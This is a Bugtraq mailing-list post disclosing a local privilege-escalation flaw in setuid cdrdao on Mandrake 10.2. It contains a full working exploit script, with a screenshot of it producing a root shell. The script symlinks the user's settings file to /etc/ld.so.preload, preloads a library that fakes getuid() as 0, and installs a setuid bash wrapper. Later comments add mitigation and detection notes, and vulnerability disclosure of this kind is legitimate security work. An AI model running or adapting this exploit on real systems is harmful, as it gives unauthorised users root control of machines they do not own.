
Bugtraq mailing list archives

cdrdao exploit for mandrake 10.2 ( Mandriva 2005)
From: newbug Tseng <newbug () chroot org>
Date: 16 May 2005 03:09:10 -0000



Hi.
It seems the cdrdao vulnerability still exists in Mandrake 10.2 (Mandriva 2005).
I have no idea why Mandrake keeps forgetting to fix this vulnerability ...
Anyway, I hope Mandrake will fix this vulnerability as soon as possible.

--- screenshot ---
[newbug () t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug () t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug () t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
! () #$@%#$%#$%! () %^
[+] Congratulation, You win the game !!
[root () t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root () t43 tmp]# 
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org 
# IRC: irc.chroot.org #chroot
# May 2005
#
# What the steps below rely on: cdrdao is installed setuid root and, when
# asked to save its settings, writes ~/.cdrdao with root privileges while
# following a symlink placed there.  The symlink redirects that write to
# /etc/ld.so.preload, which is then filled with the path of a small library
# that overrides getuid().
#
# Defender notes: the mitigation is for the package not to ship cdrdao
# setuid root (or for cdrdao to drop privileges and refuse symlinks before
# writing files under $HOME).  Creation of, or an unprivileged write to,
# /etc/ld.so.preload and a ~/.cdrdao symlink pointing into /etc are
# high-signal indicators.  Depending on where it stops, this script can leave
# behind the ~/.cdrdao symlink, /tmp/ld.so, /tmp/sh and a dangling
# /etc/ld.so.preload entry.
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org" 
echo "May 2005"

# Precondition: the whole technique needs a setuid cdrdao (-u tests the bit).
echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
        echo "[-] Failed";
        exit
fi
echo "[+] done.";
# Bail out rather than clobber an existing preload file.
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
        echo "[-] Failed."
        exit
else
        echo "[+] done."
fi

# Remove any previous settings file so the symlink created below can take
# its place (-f is false for a dangling symlink; ln -sf replaces it anyway).
echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
        rm -rf ~/.cdrdao
fi
echo "[+] done."

# All artifacts below live at fixed, predictable paths under /tmp.
cd /tmp

# Hook library: any process that preloads it sees getuid() return 0.
echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
        return 0;
}
EOF
echo "[+] done."
# Helper program, later made setuid root by the su step: it removes the hook
# library, then the preload entry, and execs bash.
# NOTE(review): because the helper itself starts with the hook preloaded, its
# getuid() self-check presumably sees the hooked value rather than the real
# uid — confirm.  On its failure path /etc/ld.so.preload is left pointing at
# the already-unlinked /tmp/ld.so.
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main(int argc,char **argv)
{
        setreuid(0,0);
        setgid(0);

        unlink("/tmp/ld.so");
        if(getuid())
        {
                printf("[-] Failed.\n");
                unlink(argv[0]);
                exit(0);
        }
        printf("[+] Congratulation, You win the game !!\n");
        unlink("/etc/ld.so.preload");

        execl("/bin/bash","bash",(char *)0);

        return 0;
}
EOF
echo "[+] done."

# The symlink that redirects cdrdao's privileged settings write.
echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."

echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."

# umask 0 presumably so the file cdrdao creates (as root) through the
# symlink is world-writable and can be overwritten by this unprivileged
# user further down.
umask 0

# Trigger the privileged settings write.  Output is discarded, so success is
# judged only by the existence check that follows.
echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."

echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
        echo "[+] done."
else
        echo "[-] Failed."
        exit
fi
# Point the (now world-writable) preload file at the hook library.
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
# No password is supplied here, so this step presumably succeeds only
# because of the preload.  Its output is discarded; a failure becomes
# visible only when /tmp/sh runs.
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "! () #\$@%#$%#$%! () %^"
/tmp/sh
--- end of cdrdao_exp.sh ---

